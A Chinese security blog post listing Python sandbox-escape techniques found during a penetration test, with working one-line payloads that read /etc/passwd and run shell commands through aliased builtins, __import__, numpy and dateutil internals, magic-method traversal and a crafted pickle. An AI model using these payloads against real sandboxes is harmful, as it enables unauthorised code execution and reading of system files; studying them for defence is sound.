笔者在工作中碰到的一个系统,能写入python脚本,但是有黑名单函数过滤,在Bypass的过程的觉得有意思的地方都记录下来。
1.黑名单下的函数
1.1 变量 = 函数名a = open
print(a("/etc/passwd").read())
1.2 空格+换行
经过测试,函数名后面加点空格换一行都能执行。print open \
("/etc/passwd").read()
2.第三方库内置的函数
一般都会有在白名单的第三方库的,除非他们程序员太厉害了,所有模块都自己实现。
如numpy这个库,内置了很多可以执行命令的地方。from numpy.distutils.exec_command import _exec_command as system
system("ls /")
3.import
大概常用的就几种,第三方的就不说了,欢迎补充
3.1 利用as取别名
import os as o
3.2 内置函数 import
__import__("os").system("whoami")
3.3 逗号+as(如果知道目录结构还可以用点号或者星号)
import time as t,os as o,urllib
3.4 魔术方法(思路来自:美丽联合集团安全应急响应中心@Viarus)
[].__class__.__base__.__subclasses__()魔术方法,加载全部模块,需要for遍历之后找到模块来调用。
3.5 getattr函数(首先你需要在内存中已经加载这个库,@kttzd师傅的姿势)
如numpy库的from numpy.core import *
_ufunc_reconstruct("os","system")("whoami")
4.__init__.py 加载的三方库
这个地方很容易被程序员忽略...
__init__.py 里面import的库,我们可以直接使用。
如dateutil这个第三方库。
dateutil/zoneinfo/__init__.py 下第三行就有import osfrom dateutil import zoneinfo
zoneinfo.os.system("ls /")
5.反序列import pickle
pickle.loads(b"cos\nsystem\n(S'ls'\ntR.")
这里有个经典的案例https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html
再分享个没啥用tips,这次测试碰到的一个案例,因为之前被别人挖过,所以限制了对外发请求,又不能print打印出命令执行的结果,当时不是很肯定存在命令执行,没法证明就没法提交上去,后面用变量接收命令执行的结果然后用int函数强制转换,报错的时候就把命令执行返回的str带出来了(后面@kttzd 师傅翻出这个系统的文档,有个函数专门用来打印日志...)
最后的最后再感谢下@kttzd 师傅的姿势。
参考
1303
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
